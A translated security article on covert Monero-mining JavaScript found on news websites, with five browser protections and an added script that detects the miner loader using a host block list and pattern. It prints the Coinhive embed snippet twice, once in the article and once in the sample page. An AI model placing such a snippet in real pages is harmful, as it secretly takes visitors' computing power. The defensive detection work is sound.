How to protect yourself against JavaScript cryptocurrency miners?

For a few days now, emotions have been running high after the discovery of malicious JavaScript on websites that mines the Monero cryptocurrency. Someone apparently had no scruples and decided to use the processing power of users' computers to get rich, and evidently forgot to inform the other party of their intentions. As a result, the victims see slightly higher electricity bills, and the perpetrators count income from an additional source.

The domino effect

One computer is definitely not enough to mine cryptocurrency successfully. Companies such as Coinhive and JSECoin offer a few dozen percent of the profits in exchange for embedding browser scripts that, once running on visitors' devices, start using the power of the processor, of course without the users' knowledge. Theoretically, any owner of a website or botnet can use its popularity to get rich. All you need to do is create an account with the provider that offers the JavaScript API and paste the code into the source of the page:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.User('<site-key>', 'john-doe');
  miner.start();
</script>

If 10 people stay on the website non-stop, the owner of the script, identified by the unique key and username, can count on earnings of about $27 a month. The commission is 30%.

The scale of the problem

Most websites end up containing such malicious scripts by accident, most often because files were swapped after vulnerabilities in the server configuration or web applications were exploited. However, we can assume that websites such as gazeta.pl, katowice.naszemiasto.pl, warszawa.naszemiasto.pl, nowiny24.pl, rp.pl and many, many others have a common denominator: suppliers of rotating ads who often do not verify what goes into their systems for displaying advertisements on partner websites.

The Safe Browser for Chrome also included a mining script.
CoinHive script on one of the Tor network entry nodes.

How to protect yourself?

We present 5 ways to protect yourself against JavaScript that mines cryptocurrency. Duplicating protective layers is not necessary, although using several of them certainly will not hurt.

  1. The public GitHub repository hosts the "No Coin" plugin for the Firefox, Chrome and Opera browsers. The extension has already been added to the official repositories of each vendor. We recommend installing it, because it protects not only against the described Monero-mining script, but also against miners of other cryptocurrencies.
  2. A similar effect is achieved by installing the "uBlock Origin" ad blocker. In the "my filters" configuration, we add coin-hive.com/lib/coinhive.min.js, preceding the entry with the https:// protocol. In addition to blocking ads, spam hosts, hosts with malicious ads, spyware hosts and malware hosts, we gain the ability to block custom URLs.
  3. We install the very effective Bitdefender TrafficLight plugin for scanning web pages. The installer automatically detects the browser (Chrome, Firefox or Safari) and takes the user to the repository with the extension. By installing the Bitdefender add-on, we get one of the most effective scanners in the world for detecting phishing, malware and scam websites, as well as protection directly in the search results.
  4. We install the NoScript add-on for browsers.
  5. Most security programs with modules for scanning websites should already detect similar malicious scripts. Like it or not, we are once again richer in experience that confirms the belief that computer protection should be comprehensive and begin with the browser.
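
For website owners, whose pages can end up carrying such a script after a compromise or through an ad supplier, the following added example (not code from the article or from any of the tools listed) scans page source for the loader and the CoinHive constructor shown earlier. The host list uses only the two domains named in this article; the sample page and the example.org URLs are constructed.

```javascript
// Hosts named in the article; extend the list for other mining services.
const BLOCKED_HOSTS = ['coinhive.com', 'coin-hive.com'];
// Inline start-up code: "new CoinHive.<Something>(" as in the article's snippet.
const INLINE_RE = /\bnew\s+CoinHive\s*\.\s*\w+\s*\(/;

// Resolve a src value (absolute, protocol-relative or relative) to a hostname.
function hostOf(src, base = 'https://page.invalid/') {
  try { return new URL(src.trim(), base).hostname.toLowerCase(); }
  catch { return null; }
}

// Match the host itself or any subdomain, never a substring of the URL.
function isBlockedHost(host) {
  return BLOCKED_HOSTS.some(h => host === h || host.endsWith('.' + h));
}

function findMinerScripts(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const [, attrs, body] of html.matchAll(scriptRe)) {
    const srcM = attrs.match(/\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i);
    if (srcM) {
      const src = srcM[1] ?? srcM[2] ?? srcM[3];
      const host = hostOf(src);
      if (host && isBlockedHost(host)) findings.push({ kind: 'external', detail: src });
    }
    if (INLINE_RE.test(body)) {
      findings.push({ kind: 'inline', detail: body.trim().split('\n')[0].trim() });
    }
  }
  return findings;
}

// Constructed sample page: one benign script, the loader, the inline start-up
// code, and a benign URL that merely contains "coinhive.com" in its path.
const SAMPLE_PAGE = `
<html><head>
<script src="https://cdn.example.org/jquery.min.js"></script>
<script src="//coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.User('<site-key>', 'john-doe');
  miner.start();
</script>
<script src='https://cdn.example.org/coinhive.com/readme.js'></script>
</head><body>...</body></html>`;

console.log(findMinerScripts(SAMPLE_PAGE));
```

The check works on static source only; a script injected at runtime by an ad frame will not appear in the HTML file and has to be caught in the browser or at the network layer.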



We use the Google Cloud Translation and Gengo APIs to translate articles, with the exception of our comparative tests.